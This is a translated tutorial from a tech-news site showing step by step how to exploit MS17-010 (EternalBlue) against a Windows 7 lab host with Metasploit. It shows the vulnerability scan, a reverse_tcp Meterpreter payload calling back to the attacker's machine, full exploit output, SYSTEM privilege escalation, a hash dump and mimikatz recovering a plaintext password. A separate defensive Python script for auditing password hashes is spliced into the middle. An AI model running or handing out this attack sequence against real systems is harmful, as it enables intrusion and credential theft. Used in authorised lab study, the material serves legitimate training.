
MS17-010 vulnerability exploitation tutorial

2025-03-26 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

I'm mainly writing this down so I can look it up when I forget it later. Experts, feel free to skip it. I'll say the important things three times. Ha ha

Attacker machine:
  IP address: 192.168.10.15
  System: Kali Linux

Target machine:
  IP address: 192.168.10.13
  System: Windows 7

Start the Metasploit Framework:

~ # msfconsole

Find the module you need to use:

msf > search ms17-010

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

First use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to check whether the target system is vulnerable.

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > options   # see which parameters need to be set; look at the Required column, anything marked yes must be set

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.13   # most parameters have defaults; only rhosts needs to be set
rhosts => 192.168.10.13
msf auxiliary(scanner/smb/smb_ms17_010) > run   # the returned result shows the host is likely vulnerable to MS17-010

[+] 192.168.10.13:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use the exploit module:

msf auxiliary(scanner/smb/smb_ms17_010) > back   # back returns to the previous level; it is optional, you can also select another module directly. Just mentioning it.
msf >
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > options   # view the parameters to be set

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.10.13   # set the target IP
RHOST => 192.168.10.13
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp   # set the payload; for a 32-bit target use windows/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.10.13    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.15   # set the local host
lhost => 192.168.10.15
msf exploit(windows/smb/ms17_010_eternalblue) > run   # execute

[*] Started reverse TCP handler on 192.168.10.15:4444
[*] 192.168.10.13:445 - Connecting to target for exploitation.
[+] 192.168.10.13:445 - Connection established for exploitation.
[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.10.13:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.10.13:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.10.13:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.13:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.13:445 - Starting non-paged pool grooming
[+] 192.168.10.13:445 - Sending SMBv2 buffers
[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.13:445 - Sending final SMBv2 buffers.
[*] 192.168.10.13:445 - Sending last fragment of exploit packet!
[*] 192.168.10.13:445 - Receiving response from exploit packet
[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.13:445 - Sending egg to corrupted connection.
[*] 192.168.10.13:445 - Triggering free of corrupted buffer.
[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   # an attempt may fail midway; be patient, it retries
[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.10.13:445 - Connecting to target for exploitation.
[+] 192.168.10.13:445 - Connection established for exploitation.
[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.10.13:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.10.13:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.10.13:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.13:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.13:445 - Starting non-paged pool grooming
[+] 192.168.10.13:445 - Sending SMBv2 buffers
[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.13:445 - Sending final SMBv2 buffers.
[*] 192.168.10.13:445 - Sending last fragment of exploit packet!
[*] 192.168.10.13:445 - Receiving response from exploit packet
[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.13:445 - Sending egg to corrupted connection.
[*] 192.168.10.13:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.10.13
[*] Meterpreter session 1 opened (192.168.10.15:4444 -> 192.168.10.13:49341) at 2018-05-13 10:17:45 +0800
[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >    # a reverse Meterpreter session has come back

Privilege escalation after exploitation:

meterpreter > sysinfo   # view the system information
Computer        : INI-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem   # escalating privileges this way is usually smooth; sometimes it fails, in which case you can also escalate by bypassing UAC, see: http://netsecurity.51cto.com/art/201612/524691.htm
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Dump the user password hashes:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f22bada0de76a5744d444632dafa2a7:::
Ini:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
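From the defender's side, the most useful thing to do with output like the hashdump above is audit it. The following Python is an added example, not code from the original post: it parses pwdump-format lines and flags accounts whose stored hashes indicate weak configuration, using the two well-known values visible above, the LM hash of an empty string (aad3b435...) and the NT hash of an empty string (31d6cfe0..., which is why Administrator and Guest show the same value: both have a blank password). The sample input is constructed from the four lines above plus one made-up "Backup" account that reuses Ini's hash.

```python
import re
from collections import Counter

# Two well-known values, both visible in the hashdump output above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM hashing is disabled (good)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the account has a blank password

# pwdump line format emitted by hashdump: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def audit_pwdump(lines):
    """Return {user: (rid, issues)} for accounts whose stored hashes indicate weakness.
    Issues: blank-password (NT hash of ""), lm-hash-stored (LM hashing not disabled),
    shared-password (same NT hash as another account). hashdump does not report whether
    an account is enabled, so a hit on e.g. Guest must be checked against its status.
    """
    parsed = []
    for ln in filter(None, (s.strip() for s in lines)):
        m = PWDUMP_RE.match(ln)
        if not m:
            raise ValueError(f"not a pwdump line: {ln!r}")
        user, rid, lm, nt = m.groups()
        parsed.append((user, int(rid), lm.lower(), nt.lower()))

    # Same NT hash means same password: count the owners of each non-empty hash.
    owners = Counter(nt for *_, nt in parsed if nt != EMPTY_NT)

    findings = {}
    for user, rid, lm, nt in parsed:
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank-password")
        if lm != EMPTY_LM:
            issues.append("lm-hash-stored")
        if owners[nt] > 1:
            issues.append("shared-password")
        if issues:
            findings[user] = (rid, tuple(issues))
    return findings

# Constructed sample: the four lines from the hashdump above, plus one made-up account
# ("Backup") that reuses Ini's NT hash so the reuse check has something to find.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f22bada0de76a5744d444632dafa2a7:::
Ini:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Backup:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
"""
```

Running `audit_pwdump(SAMPLE.splitlines())` reports Administrator and Guest as blank-password and Ini and Backup as shared-password, while HomeGroupUser$ is clean.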

meterpreter > load mimikatz   # load mimikatz, the password-extraction tool
Loading extension mimikatz...Success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
Kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     INI-PC$
0;47944   NTLM
0;999     NTLM       WORKGROUP     INI-PC$
0;114022  NTLM       ini-PC        ini            123456
0;113976  NTLM       ini-PC        ini            123456    # the user's plaintext password
